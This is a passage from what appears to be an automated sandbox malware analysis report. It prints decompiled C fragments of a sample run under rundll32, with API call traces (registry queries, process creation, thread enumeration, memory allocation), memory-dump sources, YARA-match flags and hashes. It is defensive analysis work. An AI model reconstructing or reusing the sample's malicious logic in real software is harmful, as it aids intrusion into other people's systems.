					_t30 = E049F4BD6(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E049F595A(_t31, 0x102, _t28, _t30); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E049FA000 = E049FA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E049F15B9( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x49fa30c, 0) == 0x102);
				return _t30;
			}


















                                            0x049f5347
                                            0x049f534d
                                            0x049f5354
                                            0x049f535c
                                            0x049f5362
                                            0x049f5365
                                            0x049f5367
                                            0x049f5367
                                            0x049f536f
                                            0x049f536f
                                            0x049f5379
                                            0x00000000
                                            0x00000000
                                            0x049f5388
                                            0x049f538c
                                            0x049f5390
                                            0x049f5395
                                            0x049f5399
                                            0x049f53d5
                                            0x049f53d7
                                            0x049f53d7
                                            0x049f539b
                                            0x049f53a2
                                            0x049f53cc
                                            0x049f53a4
                                            0x049f53a4
                                            0x049f53a9
                                            0x049f53c5
                                            0x049f53ab
                                            0x049f53ab
                                            0x049f53b0
                                            0x049f53b5
                                            0x049f53b8
                                            0x049f53ba
                                            0x049f53bf
                                            0x049f53c1
                                            0x049f53c1
                                            0x049f53bf
                                            0x049f53b0
                                            0x049f53a9
                                            0x049f53a2
                                            0x049f5399
                                            0x049f53e4
                                            0x049f53e9
                                            0x049f53e9
                                            0x049f540d

                                            APIs
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76CC81D0), ref: 049F53F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ObjectSingleWait
                                            • String ID:
                                            • API String ID: 24740636-0
                                            • Opcode ID: b2f20c2d10b20c6062c334c646f716d6b1d46b1fac1aaea27999a50aa9833caa
                                            • Instruction ID: 9ecb9fc4d367a0791e7d481f2855cec1df362cdeb0df3f2e8fac88978c512f19
                                            • Opcode Fuzzy Hash: b2f20c2d10b20c6062c334c646f716d6b1d46b1fac1aaea27999a50aa9833caa
                                            • Instruction Fuzzy Hash: E3216D32700205EBDB119E59DC80B6E77F9EB80365F568439EA0597241D7F4FC46CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580FE23 Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0580FE75
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 6e954402e648b5a5f723f092b52d0f0ef360aaec43ebcf8ff48a7ddaaf2087fe
                                            • Instruction ID: c4a8e74af0fd59a1cbd952ade538c94196b7aaad3686040d233a4690dee796ec
                                            • Opcode Fuzzy Hash: 6e954402e648b5a5f723f092b52d0f0ef360aaec43ebcf8ff48a7ddaaf2087fe
                                            • Instruction Fuzzy Hash: 64111B3220420AAFDF529FA9DC419DA7FA9FF08270B059125FE29D61A1CB31DC21DF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6D05 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 34%
                                            			E049F6D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x49fa348; // 0x57d5a8
				_t4 = _t15 + 0x49fb39c; // 0x4f78944
				_t20 = _t4;
				_t6 = _t15 + 0x49fb124; // 0x650047
				_t17 = E049F69D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E049F1109(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                            0x049f6d0f
                                            0x049f6d16
                                            0x049f6d17
                                            0x049f6d18
                                            0x049f6d19
                                            0x049f6d1f
                                            0x049f6d24
                                            0x049f6d24
                                            0x049f6d2e
                                            0x049f6d40
                                            0x049f6d47
                                            0x049f6d75
                                            0x049f6d49
                                            0x049f6d4b
                                            0x049f6d50
                                            0x049f6d72
                                            0x049f6d52
                                            0x049f6d55
                                            0x049f6d5c
                                            0x049f6d61
                                            0x049f6d63
                                            0x049f6d63
                                            0x049f6d68
                                            0x049f6d68
                                            0x049f6d50
                                            0x049f6d7c

                                            APIs
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                              • Part of subcall function 049F1109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,049F2B23,004F0053,00000000,?), ref: 049F1112
                                              • Part of subcall function 049F1109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,049F2B23,004F0053,00000000,?), ref: 049F113C
                                              • Part of subcall function 049F1109: memset.NTDLL ref: 049F1150
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F6D68
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeString$lstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 397948122-0
                                            • Opcode ID: ccc0434ba5a9ee644e54125c945d2b0f51355bb5fbf47c006ef3bf85ceb6d776
                                            • Instruction ID: 97b0a9e1667832158de81098e2dcf853af9fc6ecb41aacf9c11fbfe026dd4f65
                                            • Opcode Fuzzy Hash: ccc0434ba5a9ee644e54125c945d2b0f51355bb5fbf47c006ef3bf85ceb6d776
                                            • Instruction Fuzzy Hash: 08015A72600629BFDB119FA8CC04EAABBB9EB44654F004435EA15E6060E7B0BD62C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F267F Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E049F267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E049F215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x49fa348; // 0x57d5a8
						_t9 = _t17 + 0x49fba38; // 0x444f4340
						_t20 = E049F250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x49fa2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                            0x049f2682
                                            0x049f2688
                                            0x049f26df
                                            0x049f268e
                                            0x049f2699
                                            0x049f269e
                                            0x049f26a2
                                            0x049f26af
                                            0x049f26b7
                                            0x049f26c3
                                            0x049f26cb
                                            0x049f26d5
                                            0x049f26d5
                                            0x049f26a2
                                            0x049f26e4

                                            APIs
                                              • Part of subcall function 049F215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049F2172
                                              • Part of subcall function 049F250D: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 049F2541
                                              • Part of subcall function 049F250D: StrStrA.SHLWAPI(00000000,?), ref: 049F254E
                                              • Part of subcall function 049F250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 049F256D
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,049F61F6), ref: 049F26D5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Allocate$Freelstrlen
                                            • String ID:
                                            • API String ID: 2220322926-0
                                            • Opcode ID: 02e93b0ae6e8d6c105936b734cf46f5df868feccc2ab76a41a67e29490321a17
                                            • Instruction ID: 0619ed9b06d0e2db23fcfe9af69740c544f25a72d86930c06bca5adeb4b886f3
                                            • Opcode Fuzzy Hash: 02e93b0ae6e8d6c105936b734cf46f5df868feccc2ab76a41a67e29490321a17
                                            • Instruction Fuzzy Hash: 9F016D76200608BFDB11DF84DC00F9A7BADEB44344F104076FA0996160E772FA85DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05822A8B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 05822A98
                                              • Part of subcall function 05822BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,05800000), ref: 05822C64
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                            • String ID:
                                            • API String ID: 123106877-0
                                            • Opcode ID: 67d40e0486b29b397827ec3d2e12de9fa9115d61cb44dfa35ef0b12a12d1aae4
                                            • Instruction ID: a39a42317afb7d8cd267408d9c32b5585f7f6db1c4d97dd5a0af2b7365980728
                                            • Opcode Fuzzy Hash: 67d40e0486b29b397827ec3d2e12de9fa9115d61cb44dfa35ef0b12a12d1aae4
                                            • Instruction Fuzzy Hash: 14A001BA7A9226BD3218EA566D8BD3A0A9DE4C0E653A0855ABC07D8940A8942CC61036
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05822AA6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 05822A98
                                              • Part of subcall function 05822BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,05800000), ref: 05822C64
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                            • String ID:
                                            • API String ID: 123106877-0
                                            • Opcode ID: 758f874b59c0bad8d9101d9263a877a960591104bed8f47c12763a4bc6278d6e
                                            • Instruction ID: 4a4e3b6869d3fa0687062888b3c4e6a69c6cbe1c1932a737d47b7f254ce824ed
                                            • Opcode Fuzzy Hash: 758f874b59c0bad8d9101d9263a877a960591104bed8f47c12763a4bc6278d6e
                                            • Instruction Fuzzy Hash: 95A002A939D127BD311465565D47C36099DE4C4D553604559AC03C854064941CC51031
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4C73 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F4C73(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x49fa2d8, 0, _a4); // executed
				return _t2;
			}




                                            0x049f4c7f
                                            0x049f4c85

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: ed5ee48f03f005f41b37c0e1441b90a7bb4bdb4737ee630c89f782b4c95c9cc1
                                            • Instruction ID: a2f7a52f2d86c144fd650031df3d060cc2ec6d59b39f38c75c83b3c71240f54d
                                            • Opcode Fuzzy Hash: ed5ee48f03f005f41b37c0e1441b90a7bb4bdb4737ee630c89f782b4c95c9cc1
                                            • Instruction Fuzzy Hash: CBB012B1308200ABCB114B40DE04F057E21E790700F004030F30800070C2361C60FB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F4DF6 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F4DF6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x49fa2d8, 0, _a4); // executed
				return _t2;
			}




                                            0x049f4e02
                                            0x049f4e08

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 026ac37676668c8dbaa4abd90297f0535277799afaf53038a73293e94d88b304
                                            • Instruction ID: b75d6a3d35cadb005911b82bcb8723ff9614d2c0d7e0febb184cf11bf2f9512d
                                            • Opcode Fuzzy Hash: 026ac37676668c8dbaa4abd90297f0535277799afaf53038a73293e94d88b304
                                            • Instruction Fuzzy Hash: 40B01271208200ABCA014B40DD08F457F21F750700F004030F60840070C2371C60FB04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05811C01 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e934ea8da9c7e3182fb2d31f46e38c14b92d027f2b435a89205b490549600bec
                                            • Instruction ID: e993c3c591f9b6f77e6e0e4b037975da939e988abb8b5dbe14e84b12869e6ab5
                                            • Opcode Fuzzy Hash: e934ea8da9c7e3182fb2d31f46e38c14b92d027f2b435a89205b490549600bec
                                            • Instruction Fuzzy Hash: 48B01271110100BBDE214B10EE06F457E21A760700F00C011FB09000708A3124A0EB1A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F17E5 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F17E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E049F2F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E049F4DF6(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E049F4C73(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E049F679A(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E049F3072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                            0x049f17f0
                                            0x049f17f3
                                            0x049f17fa
                                            0x049f17fd
                                            0x049f1800
                                            0x049f1805
                                            0x049f1901
                                            0x049f1905
                                            0x049f1817
                                            0x049f1823
                                            0x049f182a
                                            0x049f1831
                                            0x00000000
                                            0x00000000
                                            0x049f1837
                                            0x049f183f
                                            0x00000000
                                            0x00000000
                                            0x049f1845
                                            0x049f184e
                                            0x049f1852
                                            0x00000000
                                            0x00000000
                                            0x049f1854
                                            0x049f185b
                                            0x049f1860
                                            0x049f1863
                                            0x049f1865
                                            0x049f18e6
                                            0x049f18ed
                                            0x049f18ef
                                            0x00000000
                                            0x00000000
                                            0x049f18f1
                                            0x049f18f5
                                            0x049f18fa
                                            0x049f18fa
                                            0x00000000
                                            0x049f18f5
                                            0x049f186c
                                            0x049f1874
                                            0x049f1874
                                            0x049f187d
                                            0x049f188b
                                            0x049f18e2
                                            0x049f18e2
                                            0x00000000
                                            0x049f18ae
                                            0x049f18b1
                                            0x00000000
                                            0x049f18b1
                                            0x049f188b
                                            0x049f18c0
                                            0x049f18ce
                                            0x049f18d3
                                            0x049f18d5
                                            0x049f18ea
                                            0x00000000
                                            0x049f18ea
                                            0x049f18d7
                                            0x049f18dd
                                            0x049f18e0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f18e0

                                            APIs
                                            • memcpy.NTDLL(00000000,?,?,?,?,049F58B7,00000001,?,?,049F58B7), ref: 049F186C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                            • Instruction ID: 1365a46a0291c236a41d3416aca28dcbc3bc9089256385470b21286ed8754daf
                                            • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                            • Instruction Fuzzy Hash: 4E313D71E00219EFEF25DED4CD81AEEB779BB44304F5044B9E615A7140D730AE45DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02CC1CD2 Relevance: 1.3, APIs: 1, Instructions: 86memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.419649464.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2cc0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                            • Instruction ID: af8e87425a5a898070f28a653b28f0e1375b238e3f184be05e206df4d007483a
                                            • Opcode Fuzzy Hash: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                            • Instruction Fuzzy Hash: 884126B09012068FDB04CF65C5547AEBBF0FF48304F24856DD858AB351D3BA9946CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A0B6 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,05817C87,00000000,?,05817C87,00000000,00000001,00000000,76C84D40,?,?,?,05817C87,00000000), ref: 0581A148
                                              • Part of subcall function 0581C051: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05813796,00000000,00000001,-00000007,?,00000000), ref: 0581C074
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                            • String ID:
                                            • API String ID: 1301464996-0
                                            • Opcode ID: 961fdb1b30cc8de93ee69062f601e45288d6b53b311e7d714adf166abc0deeec
                                            • Instruction ID: 9fa821c6b12e4cf6281cb8a2de8b4c3028dfc5c2bcd67fde96ddd48a62c5b529
                                            • Opcode Fuzzy Hash: 961fdb1b30cc8de93ee69062f601e45288d6b53b311e7d714adf166abc0deeec
                                            • Instruction Fuzzy Hash: 83119475611205EFDB28EE59DC85EBA7BADEB44620F504025FD03DB290DB70ED808B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05805FC9 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0580603A
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                              • Part of subcall function 05805DA0: CloseHandle.KERNEL32(?), ref: 05805DC6
                                              • Part of subcall function 05805DA0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05805DD2
                                              • Part of subcall function 05805DA0: GetModuleHandleA.KERNEL32(?,05D7978E), ref: 05805DF2
                                              • Part of subcall function 05805DA0: GetProcAddress.KERNEL32(00000000), ref: 05805DF9
                                              • Part of subcall function 05805DA0: Thread32First.KERNEL32(?,0000001C), ref: 05805E09
                                              • Part of subcall function 05805DA0: CloseHandle.KERNEL32(?), ref: 05805E51
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                            • String ID:
                                            • API String ID: 2627809124-0
                                            • Opcode ID: aa69dd995e65039bc8da9ef242d22bc1b6e29c872b9728366ebeaa4ddb27a325
                                            • Instruction ID: 2221d9fd1e3f005e7c58d1b4791bc4a4cfba3cf82b39ff5bd25f9f53779448ad
                                            • Opcode Fuzzy Hash: aa69dd995e65039bc8da9ef242d22bc1b6e29c872b9728366ebeaa4ddb27a325
                                            • Instruction Fuzzy Hash: 9E018471610214BF9B65D7AADC89CAF7FACEF042447004055FC01E3180DA31BE408B75
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581567E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,058134FE,05819CDB,00000000,00000000), ref: 058156F4
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
